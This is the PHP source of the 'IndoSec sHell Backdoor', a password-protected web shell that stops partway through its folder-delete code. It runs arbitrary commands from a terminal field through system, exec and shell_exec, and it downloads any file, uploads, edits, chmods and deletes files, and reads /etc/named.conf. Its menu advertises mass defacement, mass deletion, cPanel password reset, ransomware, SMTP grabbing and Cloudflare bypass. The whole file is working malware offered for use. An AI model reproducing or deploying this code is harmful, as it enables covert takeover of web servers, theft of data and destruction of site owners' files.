Indosec - webshell

1. <?php
2. session_start();
3. error_reporting(0);
4. @set_time_limit(0);
5. @clearstatcache();
6. @ini_set('error_log',NULL);
7. @ini_set('log_errors',0);
8. @ini_set('max_execution_time',0);
9. @ini_set('output_buffering',0);
10. @ini_set('display_errors', 0);
11.  
12. /* Configurasi */
13. $aupas = "54062f3bf6377d42b4fab7c8fedfc7da";// IndoSec
14. $default_action = 'FilesMan';
15. $default_use_ajax = true;
16. $default_charset = 'UTF-8';
17. date_default_timezone_set("Asia/Jakarta");
18. function login_shell() {
19. ?>
20. <!DOCTYPE html>
21. <html>
22. <head>
23. <meta name="viewport" content="widht=device-widht, initial-scale=1.0"/>
24. <meta name="theme-color" content="#343a40"/>
25. <meta name="author" content="Holiq"/>
26. <meta name="copyright" content="{ IndoSec }"/>
27. <title>{ IndoSec sHell }</title>
28. <link rel="icon" type="image/png" href="https://www.holiq.projectku.ga/indosec.png"/>
29. <link rel="stylesheet" href="https://stackpath.bootstrapcdn.com/bootstrap/4.3.0/css/bootstrap.min.css"/>
30. <link rel="stylesheet" href="https://use.fontawesome.com/releases/v5.7.1/css/all.css"/>
31. </head>
32. <body class="bg-dark text-center text-light">
33. <div class="container text-center mt-3">
34. <h1>{ INDOSEC }</h1>
35. <h5>sHell Backdoor</h5><hr/>
36. <p class="mt-3 font-weight-bold"><i class="fa fa-terminal"></i> Please Login</p>
37. <form method="post">
38. <div class="form-group input-group">
39. <div class="input-group-prepend">
40. <div class="input-group-text"><i class="fa fa-user"></i></div>
41. </div>
42. <input type="password" name="pass" placeholder="User Id..." class="form-control">
43. </div>
44. <input type="submit" class="btn btn-danger btn-block" class="form-control" value="Login">
45. </form>
46. </div>
47. <a href="https://facebook.com/IndoSecOfficial" class="text-muted fixed-bottom mb-3">Copyright 2019 @ { IndoSec }</a>
48. </body>
49. </html>
50. <?php
51. exit;
52. }
53. if(!isset($_SESSION[md5($_SERVER['HTTP_HOST'])])){
54. if(isset($_POST['pass']) && (md5($_POST['pass']) == $aupas)){
55. $_SESSION[md5($_SERVER['HTTP_HOST'])] = true;
56. }else{
57. login_shell();
58. }
59. }
60. /*
61. * Akhir Login
62. *
63. * Aksi Download
64. */
65. if(isset($_GET['file']) && ($_GET['file'] != '') && ($_GET['aksi'] == 'download')) {
66. @ob_clean();
67. $file = $_GET['file'];
68. header('Content-Description: File Transfer');
69. header('Content-Type: application/octet-stream');
70. header('Content-Disposition: attachment; filename="'.basename($file).'"');
71. header('Expires: 0');
72. header('Cache-Control: must-revalidate');
73. header('Pragma: public');
74. header('Content-Length: ' . filesize($file));
75. readfile($file);
76. exit;
77. }
78. function w($dir,$perm) {
79. if(!is_writable($dir)) {
80. return "<font color='red'>".$perm."</font>";
81. }else{
82. return "<font color='lime'>".$perm."</font>";
83. }
84. }
85. function r($dir,$perm) {
86. if(!is_readable($dir)) {
87. return "<font color=red>".$perm."</font>";
88. } else {
89. return "<font color=lime>".$perm."</font>";
90. }
91. }
92.  
93. function exe($cmd) {
94. if(function_exists('system')) {
95. @ob_start();
96. @system($cmd);
97. $buff = @ob_get_contents();
98. @ob_end_clean();
99. return $buff;
100. } elseif(function_exists('exec')) {
101. @exec($cmd,$results);
102. $buff = "";
103. foreach($results as $result) {
104. $buff .= $result;
105. } return $buff;
106. } elseif(function_exists('passthru')) {
107. @ob_start();
108. @passthru($cmd);
109. $buff = @ob_get_contents();
110. @ob_end_clean();
111. return $buff;
112. } elseif(function_exists('shell_exec')) {
113. $buff = @shell_exec($cmd);
114. return $buff;
115. }
116. }
117.  
118. function perms($file){
119. $perms = fileperms($file);
120. if (($perms & 0xC000) == 0xC000) {
121. // Socket
122. $info = 's';
123. } elseif (($perms & 0xA000) == 0xA000) {
124. // Symbolic Link
125. $info = 'l';
126. } elseif (($perms & 0x8000) == 0x8000) {
127. // Regular
128. $info = '-';
129. } elseif (($perms & 0x6000) == 0x6000) {
130. // Block special
131. $info = 'b';
132. } elseif (($perms & 0x4000) == 0x4000) {
133. // Directory
134. $info = 'd';
135. } elseif (($perms & 0x2000) == 0x2000) {
136. // Character special
137. $info = 'c';
138. } elseif (($perms & 0x1000) == 0x1000) {
139. // FIFO pipe
140. $info = 'p';
141. } else {
142. // Unknown
143. $info = 'u';
144. }
145.  
146. // Owner
147. $info .= (($perms & 0x0100) ? 'r' : '-');
148. $info .= (($perms & 0x0080) ? 'w' : '-');
149. $info .= (($perms & 0x0040) ?
150. (($perms & 0x0800) ? 's' : 'x' ) :
151. (($perms & 0x0800) ? 'S' : '-'));
152. // Group
153. $info .= (($perms & 0x0020) ? 'r' : '-');
154. $info .= (($perms & 0x0010) ? 'w' : '-');
155. $info .= (($perms & 0x0008) ?
156. (($perms & 0x0400) ? 's' : 'x' ) :
157. (($perms & 0x0400) ? 'S' : '-'));
158.  
159. // World
160. $info .= (($perms & 0x0004) ? 'r' : '-');
161. $info .= (($perms & 0x0002) ? 'w' : '-');
162. $info .= (($perms & 0x0001) ?
163. (($perms & 0x0200) ? 't' : 'x' ) :
164. (($perms & 0x0200) ? 'T' : '-'));
165.  
166. return $info;
167. }
168.  
169. $path = str_replace('\\','/',$path);
170. $paths = explode('/',$path);
171. if(isset($_GET['dir'])) {
172. $dir = $_GET['dir'];
173. chdir($dir);
174. } else {
175. $dir = getcwd();
176. }
177.  
178. $os = php_uname();
179. $ip = getHostByName(getHostName());
180. $ver = phpversion();
181. $web = $_SERVER['HTTP_HOST'];
182. $sof = $_SERVER['SERVER_SOFTWARE'];
183. $dir = str_replace("\\","/",$dir);
184. $scdir = explode("/", $dir);
185. $mysql = (function_exists('mysql_connect')) ? "<font color=green>ON</font>" : "<font color=red>OFF</font>";
186. $curl = (function_exists('curl_version')) ? "<font color=green>ON</font>" : "<font color=red>OFF</font>";
187. $mail = (function_exists('mail')) ? "<font color=green>ON</font>" : "<font color=red>OFF</font>";
188. $total = disk_total_space($dir);
189. $free = disk_free_space($dir);
190. $pers = (int) ($free/$total*100);
191. $ds = @ini_get("disable_functions");
192. $show_ds = (!empty($ds)) ? "<a href='?dir=$dir&aksi=disabfunc' class='ds'>$ds</a>" : "<a href='?dir=$dir&aksi=disabfunc'><font color=green>NONE</font></a>";
193. $imgfol = "<img src='http://aux.iconspalace.com/uploads/folder-icon-256-1787672482.png' class='ico'></img>";
194. $imgfile = "<img src='http://icons.iconarchive.com/icons/zhoolego/material/256/Filetype-Docs-icon.png' class='ico2'></img>";
195. function formatSize( $bytes ) {
196. $types = array( 'B', 'KB', 'MB', 'GB', 'TB' );
197. for( $i = 0; $bytes >= 1024 && $i < ( count( $types ) -1 ); $bytes /= 1024, $i++ );
198. return( round( $bytes, 2 )." ".$types[$i] );
199. }
200.  
201. function ambilKata($param, $kata1, $kata2){
202. if(strpos($param, $kata1) === FALSE) return FALSE;
203. if(strpos($param, $kata2) === FALSE) return FALSE;
204. $start = strpos($param, $kata1) + strlen($kata1);
205. $end = strpos($param, $kata2, $start);
206. $return = substr($param, $start, $end - $start);
207. return $return;
208. }
209.  
210. $d0mains = @file("/etc/named.conf", false);
211. if (!$d0mains) {
212. $die = "<font color=red size=2px>Cant Read [ /etc/named.conf ]</font>";
213. $GLOBALS["need_to_update_header"] = "true";
214. }else{
215. $count = 0;
216. foreach ($d0mains as $d0main) {
217. if (@strstr($d0main, "zone")) {
218. preg_match_all('#zone "(.*)"#', $d0main, $domains);
219. flush();
220. if (strlen(trim($domains[1][0])) > 2) {
221. flush();
222. $count++;
223. }
224. }
225. }
226. $dom = "$count Domain";
227. }
228. function swall($swa,$text,$dir){
229. echo "<script>Swal.fire({
230. title: '$swa',
231. text: '$text',
232. type: '$swa',
233.  
234. }).then((value) => {window.location='?dir=$dir';})</script>";
235. }
236. ?>
237. <html>
238. <head>
239. <meta name="viewport" content="widht=device-widht, initial-scale=1"/>
240. <meta name="theme-color" content="#343a40"/>
241. <meta name="author" content="Holiq"/>
242. <meta name="copyright" content="{ IndoSec }"/>
243. <link rel="icon" type="image/png" href="https://www.holiq.projectku.ga/indosec.png"/>
244. <title>{ IndoSec sHell }</title>
245. <link rel="stylesheet" href="pojan/assets/css/bootstrap.min.css">
246. <link rel="stylesheet" href="https://stackpath.bootstrapcdn.com/bootstrap/4.3.0/css/bootstrap.min.css"/>
247. <link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/font-awesome/5.10.2/css/all.min.css"/>
248. <link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/font-awesome/4.7.0/css/font-awesome.min.css"/>
249. <script src="https://code.jquery.com/jquery-3.3.1.js"></script>
250. <script src="https://stackpath.bootstrapcdn.com/bootstrap/4.3.1/js/bootstrap.min.js"></script>
251. <script src="https://cdn.jsdelivr.net/npm/sweetalert2@8.18.0/dist/sweetalert2.all.min.js"></script>
252. </head>
253. <body class="bg-dark text-light">
254. <script>
255. $(document).ready(function(){
256. $(window).scroll(function(){
257. if ($(this).scrollTop() > 700) {
258. $(".scrollToTop").fadeIn();
259. }else{
260. $(".scrollToTop").fadeOut();
261. }
262. });
263. $(".scrollToTop").click(function(){
264. $("html, body").animate({scrollTop : 0},1000);
265. return false;
266. });
267. });
268. $(document).ready(function() {
269. $('input[type="file"]').on("change", function() {
270. let filenames = [];
271. let files = document.getElementById("customFile").files;
272. if (files.length > 1) {
273. filenames.push("Total Files (" + files.length + ")");
274. } else {
275. for (let i in files) {
276. if (files.hasOwnProperty(i)) {
277. filenames.push(files[i].name);
278. }
279. }
280. }
281. $(this).next(".custom-file-label").html(filenames.join(","));
282. });
283. });
284. var max_fields = 5;
285. var x = 1;
286. $(document).on('click', '#add_input', function(e){
287. if(x < max_fields){
288. x++;
289. $('#output').append('<div class=\"input-group\ form-group\ text-dark\" id=\"out\"><input type=\"text\" class=\"form-control\" name=\"nama_file[]\" placeholder=\"Nama File...\"><div class=\"input-group-prepend\ remove\"><div class=\"input-group-text\"><a href="#" class="text-dark"><i class=\"fa fa-minus\"></i></a></div></div></div>');
290. }
291. $('#output').on("click",".remove", function(e){
292. e.preventDefault(); $(this).parent('#out').remove(); x--;
293. repeat();
294. })
295. });
296. $(document).on('click', '#add_input1', function(e){
297. if(x < max_fields){
298. x++;
299. $('#output1').append('<div class=\"input-group\ form-group\ text-dark\" id=\"out\"><input type=\"text\" class=\"form-control\" name=\"nama_folder[]\" placeholder=\"Nama Folder...\"><div class=\"input-group-prepend\ remove\"><div class=\"input-group-text\"><a href="#" class="text-dark"><i class=\"fa fa-minus\"></i></a></div></div></div>');
300. }
301. $('#output1').on("click",".remove", function(e){
302. e.preventDefault(); $(this).parent('#out').remove(); x--;
303. repeat();
304. })
305. });
306.  
307. </script>
308. <style>
309. @import url(https://fonts.googleapis.com/css?family=Lato);
310. @import url(https://fonts.googleapis.com/css?family=Quicksand);
311. @import url(https://fonts.googleapis.com/css?family=Inconsolata);
312. input[type="text"],textarea {font-family: "Inconsolata", monospace;}
313. body{margin:0;padding:0;font-family:"Lato";overscroll-behavior:none;}
314. .infor{font-size:14px;color:#333!important;}
315. .ds{color:#f00!important;word-wrap:break-word;}
316. #tab table thead th{padding:5px;font-size:16px;white-space: nowrap;}
317. #tab tr {border-bottom:1px solid #ccc;}
318. #tab tr:hover{background:#5B6F7D;color:#fff;}
319. #tab tr td{padding:5px 10px;white-space:nowrap;}
320. .pinggir{text-align:left !important; padding-left: 4px !important;}
321. #tab tr td .badge{font-size:13px;}
322. .active,.active:hover{color:#00FF00;}
323. a {font-family:"Quicksand"; color:white;}
324. a:hover{color:dodgerBlue;}
325. .badge{width:30px;transition:.3s;}
326. .badge:hover{transform: scale(1.1);transition:.3s;}
327. .ico {width:25px;}
328. .ico2{width:30px;}
329. @media(min-width:767px){.scrollToTop{display:none !important;}}
330. .scrollToTop{
331. position:fixed;
332. bottom:30px;
333. right:30px;
334. width:35px;
335. height:35px;
336. background:#262626;
337. color:#fff;
338. border-radius:15%;
339. text-align:center;
340. opacity:.5;
341. }
342. .scrollToTop:hover{color:#fff;}
343. .up{font-size:25px;line-height:35px;}
344. .lain{color:#888888;font-size:20px;margin-left:5px;top:1px;}
345. .lain:hover{color:#fff;}
346. .tambah{
347. width:35px;
348. height:35px;
349. line-height:35px;
350. border:1px solid;
351. border-radius:50%;
352. text-align:center;
353. }
354. .fiture{margin:3px;}
355. .tmp th {font-size:14px;}
356. .tmp tr td{border:solid 1px #BBBBBB;text-align:center;font-size:13px;padding:2px 5px;}
357. .tmp tr:hover{background:#5B6F7D; color:#fff;}
358. .about{color:#000;}
359. .about .card-body .img{
360. position: relative;
361. background: url(https://i.postimg.cc/Wb1X4xNS/image.png);
362. background-size: cover;
363. width: 150px;
364. height: 150px;
365. }
366. .butn {
367. position: relative;
368. text-align: center;
369. padding: 3px;
370. background:rgba(225,225,225,.3);
371. -webkit-transition: background 300ms ease, color 300ms ease;
372. transition: background 300ms ease, color 300ms ease;
373. }
374. input[type="radio"].toggle {display:none;}
375. input[type="radio"].toggle + label {cursor:pointer;margin:0 2px;width:60px;}
376. input[type="radio"].toggle + label:after {
377. position: absolute;
378. content: "";
379. top: 0;
380. background: #fff;
381. height: 100%;
382. width: 100%;
383. z-index: -1;
384. -webkit-transition: left 400ms cubic-bezier(0.77, 0, 0.175, 1);
385. transition: left 400ms cubic-bezier(0.77, 0, 0.175, 1);
386. }
387. input[type="radio"].toggle.toggle-left + label:after {left:100%;}
388. input[type="radio"].toggle.toggle-right + label {margin-left:-5px;}
389. input[type="radio"].toggle.toggle-right + label:after {left:-100%;}
390. input[type="radio"].toggle:checked + label {cursor:default;color:#000;-webkit-transition:color 400ms;transition: color 400ms;}
391. input[type="radio"].toggle:checked + label:after {left:0;}
392. </style>
393. <nav class="navbar static-top navbar-dark">
394. <button class="navbar-toggler"type="button" data-toggle="collapse" data-target="#info" aria-label="Toggle navigation">
395. <i style="color:#fff;" class="fa fa-navicon"></i>
396. </button>
397. <div class="collapse navbar-collapse" id="info">
398. <ul>
399. <a href="https://facebook.com/IndoSecOfficial" class="lain"><i class="fa fa-facebook tambah"></i></a>
400. <a href="https://www.instagram.com/indosec.id" class="lain"><i class="fa fa-instagram tambah"></i></a>
401. <a href="https://www.youtube.com/IndoSec" class="lain"><i class="fa fa-youtube-play tambah"></i></a>
402. <a href="https://github.com/indosecid" class="lain"><i class="fa fa-github tambah"></i></a>
403. <a href="https://indosec.web.id" class="lain"><i class="fa fa-globe tambah"></i></a>
404. </ul>
405. </div>
406. </nav>
407. <?php
408. echo '
409. <div class="container">
410. <h1 class="text-center"><a href="https://facebook.com/IndoSecOfficial" style="color:#ffffff;">{ INDOSEC }</h1>
411. <center><h5>Shell Backdoor</a></h5></center>
412. <hr/>
413. <div class="text-center">
414. <div class="d-flex justify-content-center flex-wrap">
415. <a href="?" class="fiture btn btn-danger btn-sm"><i class="fa fa-home"></i> Home</a>
416. <a href="?dir='.$dir.'&aksi=upload" class="fiture btn btn-danger btn-sm"><i class="fa fa-upload"></i> Upload</a>
417. <a href="?dir='.$dir.'&aksi=buat_file" class="fiture btn btn-danger btn-sm"><i class="fa fa-plus-circle"></i> Buat File</a>
418. <a href="?dir='.$dir.'&aksi=buat_folder" class="fiture btn btn-danger btn-sm"><i class="fa fa-plus"></i> Buat Folder</a>
419. <a href="?dir='.$dir.'&aksi=masdef" class="fiture btn btn-danger btn-sm"><i class="fa fa-exclamation-triangle"></i> Mass Deface</a>
420. <a href="?dir='.$dir.'&aksi=masdel" class="fiture btn btn-danger btn-sm"><i class="fa fa-trash"></i> Mass Delete</a>
421. <a href="?dir='.$dir.'&aksi=jumping" class="fiture btn btn-danger btn-sm"><i class="fa fa-exclamation-triangle"></i> Jumping</a>
422. <a href="?dir='.$dir.'&aksi=config" class="fiture btn btn-danger btn-sm"><i class="fa fa-cogs"></i> Config</a>
423. <a href="?dir='.$dir.'&aksi=adminer" class="fiture btn btn-danger btn-sm"><i class="fa fa-user"></i> Adminer</a>
424. <a href="?dir='.$dir.'&aksi=symlink" class="fiture btn btn-danger btn-sm"><i class="fa fa-exclamation-circle"></i> Symlink</a>
425. <a href="?dir='.$dir.'&aksi=bctools" class="fiture btn btn-danger btn-sm"><i class="fas fa-network-wired"></i> Network</a>
426. <a href="?dir='.$dir.'&aksi=resetpasscp" class="fiture btn btn-warning btn-sm"><i class="fa fa-key"></i> Auto Reset Cpanel</a>
427. <a href="?dir='.$dir.'&aksi=auteduser" class="fiture btn btn-warning btn-sm"><i class="fas fa-user-edit"></i> Auto Edit User</a>
428. <a href="?dir='.$dir.'&aksi=ransom" class="fiture btn btn-warning btn-sm"><i class="fab fa-keycdn"></i> Ransomware</a>
429. <a href="?dir='.$dir.'&aksi=smtpgrab" class="fiture btn btn-warning btn-sm"><i class="fas fa fa-exclamation-circle"></i> SMTP Grabber</a>
430. <a href="?dir='.$dir.'&aksi=bypascf" class="fiture btn btn-warning btn-sm"><i class="fas fa-cloud"></i> Bypass Cloud Flare</a>
431. <a href="?dir='.$dir.'&aksi=zip_menu" class="fiture btn btn-warning btn-sm"><i class="fa fa-file-archive-o"></i> Zip Menu</a>
432. <a href="?about" class="fiture btn btn-warning btn-sm"><i class="fa fa-info"></i> About Us</a>
433. <a href="?keluar" class="fiture btn btn-warning btn-sm"><i class="fa fa-sign-out"></i> keluar</a>
434. </div>
435. </div>
436. <div class="row">
437. <div class="col-md-5"><br/>
438. <h5><i class="fa fa-terminal"></i>Terminal : </h5>
439. <form>
440. <input type="text" class="form-control" name="cmd" autocomplete="off" placeholder="id | uname -a | whoami | heked">
441. </form>
442. <hr/>
443. <h5><i class="fa fa-search"></i> Informasi : </h5>
444. <div class="card table-responsive">
445. <div class="card-body">
446. <table class="table infor">
447. <tr>
448. <td>PHP</td>
449. <td> : '.$ver.'</td>
450. </tr>
451. <tr>
452. <td>IP Server</td>
453. <td> : '.$ip.'</td>
454. </tr>
455. <tr>
456. <td>HDD</td>
457. <td class="d-flex">Total : '.formatSize($total).' Free : '.formatSize($free).' ['.$pers.'%]</td>
458. </tr>
459. <tr>
460. <td>Domain</td>
461. <td>: '.$dom.''.$die.'</td>
462. </tr>
463. <tr>
464. <td>MySQL</td>
465. <td>: '.$mysql.'</td>
466. </tr>
467. <tr>
468. <td>cURL</td>
469. <td>: '.$curl.'</td>
470. </tr>
471. <tr>
472. <td>Mailer</td>
473. <td>: '.$mail.'</td>
474. </tr>
475. <tr>
476. <td>Disable Function</td>
477. <td>: '.$show_ds.'</td>
478. </tr>
479. <tr>
480. <td>Software</td>
481. <td>: '.$sof.'</td>
482. </tr>
483. <tr>
484. <td>Sistem Operasi</td>
485. <td> : '.$os.'</td>
486. </tr>
487. </table>
488. </div>
489. </div><hr/>
490. </div>
491. <div class="col-md-7 mt-4">';
492.  
493. //keluar
494. if (isset($_GET['keluar'])) {
495. session_start();
496. session_destroy();
497. echo '<script>window.location="?";</script>';
498. }
499.  
500. //cmd
501. if(isset($_GET['cmd'])){
502. echo "<pre class='text-white'>".exe($_GET['cmd'])."</pre>";
503. exit;
504. }
505.  
506. //about
507. if (isset($_GET['about'])) {
508. echo '<div class="card text-center bg-light about">
509. <h4 class="card-header">{ IndoSec }</h4>
510. <div class="card-body">
511. <center><div class="img"></div></center>
512. <p class="card-text">{ IndoSec } Adalah Sebuah Komunitas Yang Berfokus Kepada Teknologi Di Indonesia, Dari Membuat Mengamankan Dan Mengexploitasi Sebuah Sistem.</p>
513. </div>
514. <div class="card-footer">
515. <small class="card-text text-muted">Copyright 2019 { IndoSec }</small>
516. </div>
517. </div><br/>';
518. exit;
519. }
520.  
521. //upload
522. if ($_GET['aksi'] == 'upload') {
523. echo '<form method="POST" enctype="multipart/form-data" name="uploader" id="uploader">
524. <div class="card">
525. <div class="card-body form-group">
526. <p class="text-muted">//Multiple Upload</p>
527. <div class="custom-file">
528. <input type="file" name="file[]" multiple class="custom-file-input" id="customFile">
529. <label class="custom-file-label" for="customFile">Choose file</label>
530. </div>
531. <input type="submit" class="btn btn-sm btn-primary btn-block mt-4 p-2" name="upload" value="Upload">
532. </div>
533. </div>
534. </form>';
535.  
536. if(isset($_POST['upload'])){
537. $jumlah = count($_FILES['file']['name']);
538. for($i=0;$i<$jumlah;$i++){
539. $filename = $_FILES['file']['name'][$i];
540.  
541. $up = @copy($_FILES['file']['tmp_name'][$i], "$dir/".$filename);
542.  
543. }
544. if($jumlah < 2) {
545. if($up){
546. $swa = "success";
547. $text = "Berhasil Upload $filename";
548. swall($swa,$text,$dir);
549. }else{
550. $swa = "error";
551. $text = "Gagal Upload File";
552. swall($swa,$text,$dir);
553. }
554. }else{
555. $swa = "success";
556. $text = "Berhasil Upload $jumlah File";
557. swall($swa,$text,$dir);
558. }
559. }
560. }
561.  
562. //openfile
563. if (isset($_GET['file'])) {
564. $file = $_GET['file'];
565. }
566. $nfile = basename($file);
567. //chmod
568. if($_GET['aksi'] == 'chmod_file') {
569. echo "<form method='POST'>
570. <h5>Chmod File : $nfile </h5>
571. <div class='form-group input-group'>
572. <input type='text' name='perm' class='form-control' value='".substr(sprintf('%o', fileperms($_GET['file'])), -4)."'>
573. <input type='submit' class='btn btn-danger form-control' value='Chmod'>
574. </div>
575. </form>";
576.  
577. if(isset($_POST['perm'])){
578. if(@chmod($_GET['file'],$_POST['perm'])){
579. echo '<font color="lime">Change Permission Berhasil</font><br/>';
580. }else{
581. echo '<font color="white">Change Permission Gagal</font><br/>';
582. }
583. }
584. }
585.  
586. //buat_file
587. if ($_GET['aksi'] == 'buat_file') {
588. echo "<h4><img src='http://icons.iconarchive.com/icons/zhoolego/material/256/Filetype-Docs-icon.png' class='ico2'></img> Buat File :</h4>
589. <form method='POST'>
590. <div class='input-group'>
591. <input type='text' class='form-control' name='nama_file[]' placeholder='Nama File...'>
592. <div class='input-group-prepend'>
593. <div class='input-group-text'><a id='add_input'><i class='fa fa-plus'></i></a></div>
594. </div>
595. </div><br/>
596. <div id='output'></div>
597. <textarea name='isi_file' class='form-control' rows='13' placeholder='Isi File...'></textarea><br/>
598. <input type='submit' class='btn btn-info btn-block' name='bikin' value='Buat'>
599. </form>";
600.  
601. if (isset($_POST['bikin'])) {
602. $name = $_POST['nama_file'];
603. $isi_file = $_POST['isi_file'];
604. foreach ($name as $nama_file) {
605. $handle = @fopen("$nama_file", "w");
606. if($isi_file){
607. $buat = @fwrite($handle, $isi_file);
608. }else{
609. $buat = $handle;
610. }
611. }
612. if ($buat) {
613. $swa = "success";
614. $text = "Berhasil Membuat File";
615. swall($swa,$text,$dir);
616. }else{
617. $swa = "error";
618. $text = "Gagal Membuat File";
619. swall($swa,$text,$dir);
620. }
621. }
622. }
623. /*
624. View
625. */
626. if($_GET['aksi'] == 'view') {
627. echo '[ <a class="active" href="?dir='.$dir.'&aksi=view&file='.$file.'">Lihat</a> ] [ <a href="?dir='.$dir.'&aksi=edit&file='.$file.'">Edit</a> ] [ <a href="?dir='.$dir.'&aksi=rename&file='.$file.'">Rename</a> ] [ <a href="?dir='.$dir.'&aksi=hapusf&file='.$file.'">Delete</a> ]
628. <h5>'.$imgfile.' Lihat File : '.$nfile.'</h5>
629. <textarea rows="13" class="form-control" disabled="">'.htmlspecialchars(@file_get_contents($file)).'</textarea><br/>';
630. }
631. /*
632. Edit
633. */
634. if($_GET['aksi'] == 'edit') {
635. echo '[ <a href="?dir='.$dir.'&aksi=view&file='.$file.'">Lihat</a> ] [ <a class="active" href="?dir='.$dir.'&aksi=edit&file='.$file.'">Edit</a> ] [ <a href="?dir='.$dir.'&aksi=rename&file='.$file.'">Rename</a> ] [ <a href="?dir='.$dir.'&aksi=hapusf&file='.$file.'">Delete</a> ]';
636. echo "<form method='POST'>
637. <h5>$imgfile Edit File : $nfile</h5>
638. <textarea rows='13' class='form-control' name='isi'>".htmlspecialchars(@file_get_contents($file))."</textarea><br/>
639. <button type='sumbit' class='btn btn-info btn-block' name='edit_file'>Update</button>
640. </form>";
641.  
642. if(isset($_POST['edit_file'])) {
643. $updt = fopen("$file", "w");
644. $hasil = fwrite($updt, $_POST['isi']);
645.  
646. if ($hasil) {
647. $swa = "success";
648. $text = "Berhasil Update File";
649. swall($swa,$text,$dir);
650. }else{
651. $swa = "error";
652. $text = "Gagal Update File";
653. swall($swa,$text,$dir);
654. }
655. }
656. }
657. /*
658. Rename
659. */
660. if($_GET['aksi'] == 'rename') {
661. echo '[ <a href="?dir='.$dir.'&aksi=view&file='.$file.'">Lihat</a> ] [ <a href="?dir='.$dir.'&aksi=edit&file='.$file.'">Edit</a> ] [ <a class="active" href="?dir='.$dir.'&aksi=rename&file='.$file.'">Rename</a> ] [ <a href="?dir='.$dir.'&aksi=hapusf&file='.$file.'">Delete</a> ]';
662. echo "<form method='POST'>
663. <h5>$imgfile Rename File : $nfile</h5>
664. <input type='text' class='form-control' name='namanew' placeholder='Masukan Nama Baru...' value='$nfile'><br/>
665. <button type='sumbit' class='btn btn-info btn-block' name='rename_file'>Rename</button>
666. </form>";
667.  
668. if(isset($_POST['rename_file'])) {
669. $lama = $file;
670. $baru = $_POST['namanew'];
671. rename( $baru, $lama);
672. if(file_exists($baru)) {
673. $swa = "success";
674. $text = "Nama $baru Telah Digunakan";
675. swall($swa,$text,$dir);
676. }else{
677. if(rename( $lama, $baru)) {
678. $swa = "success";
679. $text = "Berhasil Mengganti Nama Menjadi $baru";
680. swall($swa,$text,$dir);
681. }else{
682. $swa = "error";
683. $text = "Gagal Mengganti Nama";
684. swall($swa,$text,$dir);
685. }
686. }
687. }
688. }
689. /*
690. Delete File
691. */
692. if ($_GET['aksi'] == 'hapusf') {
693. echo '[ <a href="?dir='.$dir.'&aksi=view&file='.$file.'">Lihat</a> ] [ <a href="?dir='.$dir.'&aksi=edit&file='.$file.'">Edit</a> ] [ <a href="?dir='.$dir.'&aksi=rename&file='.$file.'">Rename</a> ] [ <a class="active" href="?dir='.$dir.'&aksi=hapusf&file='.$file.'">Delete</a> ]';
694. echo "
695. <div class='card card-body text-center text-dark mb-4'>
696. <p>Yakin Menghapus : $nfile</p>
697. <form method='POST'>
698. <a class='btn btn-danger btn-block' href='?dir=$dir'>Tidak</a>
699. <input type='submit' name='ya' class='btn btn-success btn-success btn-block' value='Ya'>
700. </form>
701. </div>";
702.  
703. if ($_POST['ya']) {
704. if (unlink($file)) {
705. $swa = "success";
706. $text = "Berhasil Menghapus File";
707. swall($swa,$text,$dir);
708. }else{
709. $swa = "error";
710. $text = "Gagal Menghapus File";
711. swall($swa,$text,$dir);
712. }
713. }
714. }
715. $ndir = basename($dir);
716. //chmod
717. if($_GET['aksi'] == 'chmod_dir') {
718. $ndir = basename($dir);
719. echo "<form method='POST'>
720. <h5>Chmod Folder : $ndir </h5>
721. <div class='form-group input-group'>
722. <input type='text' name='perm' class='form-control' value='".substr(sprintf('%o', fileperms($_GET['dir'])), -4)."'>
723. <input type='submit' class='btn btn-danger form-control' value='Chmod' name='chmo'>
724. </div>
725. </form>";
726. if(isset($_POST['chmo'])){
727. if(@chmod($_GET['dir'],$_POST['perm'])){
728. echo '<font color="lime">Change Permission Berhasil</font><br/>';
729. }else{
730. echo '<font color="white">Change Permission Gagal</font><br/>';
731. }
732. }
733. }
734. /*
735. Add Folder
736. */
737. if ($_GET['aksi'] == 'buat_folder' ) {
738. echo "
739. <h4>$imgfol Buat Folder :</h4>
740. <form method='POST'>
741. <div class='input-group'>
742. <input type='text' class='form-control' name='nama_folder[]' placeholder='Nama Folder...'>
743. <div class='input-group-prepend'>
744. <div class='input-group-text'><a id='add_input1'><i class='fa fa-plus'></i></a></div>
745. </div>
746. </div><br/>
747. <div id='output1'></div>
748. <input type='submit' class='btn btn-info btn-block' name='buat' value='Buat'>
749. </form>";
750.  
751. if (isset($_POST['buat'])) {
752. $nama = $_POST['nama_folder'];
753. foreach ($nama as $nama_folder) {
754. $folder = preg_replace("([^\w\s\d\-_~,;:\[\]\(\].]|[\.]{2,})", '', $nama_folder);
755. $fd = @mkdir ($folder);
756. }
757. if ($fd) {
758. $swa = "success";
759. $text = "Berhasil Membuat Folder";
760. swall($swa,$text,$dir);
761. }else{
762. $swa = "error";
763. $text = "Gagal Membuat Folder";
764. swall($swa,$text,$dir);
765. }
766. }
767. }
768.  
769. /*
770. Rename Folder
771. */
772. if ($_GET['aksi'] == 'rename_folder' ) {
773. echo "
774. [ <a href='?dir=".$dir."&aksi=rename_folder' class='active'>Rename</a> ] [ <a href='?dir=".$dir."&aksi=hapus_folder'>Delete</a> ]
775. <h4>$imgfol Rename Folder : $ndir </h4>
776. <form method='POST'>
777. <input type='text' class='form-control' name='namanew' placeholder='Masukan Nama Baru...' value='$nama'><br/>
778. <button type='sumbit' class='btn btn-info btn-block' name='ganti'>Ganti!!</button><br/>
779. </form>";
780.  
781. if(isset($_POST['ganti'])) {
782. $baru = htmlspecialchars($_POST['namanew']);
783. $ubah = rename($dir, "".dirname($dir)."/".$baru."");
784. if($ubah) {
785. $swa = "success";
786. $text = "Berhasil Mengganti Nama";
787. $dir = dirname($dir);
788. swall($swa,$text,$dir);
789. }else{
790. $swa = "error";
791. $text = "Gagal Mengganti Nama";
792. $dir = dirname($dir);
793. swall($swa,$text,$dir);
794. }
795. }
796. exit;
797. }
798.  
799. /*
800. Delete Folder
801. */
802. if ($_GET['aksi'] == 'hapus_folder' ) {
803. echo "
804. [ <a href='?dir=".$dir."&aksi=rename_folder'>Rename</a> ] [ <a href='?dir=".$dir."&aksi=hapus_folder' class='active'>Delete</a> ]
805. <div class='card card-body text-center text-dark mb-4'>
806. <p>Apakah Yakin Menghapus : $ndir ?</p>
807. <form method='POST'>
808. <a class='btn btn-danger btn-block' href='?dir=".dirname($dir)."'>Tidak</a>
809. <input type='submit' name='ya' class='btn btn-success btn-block' value='Ya'>
810. </form>
811. </div><br/>";
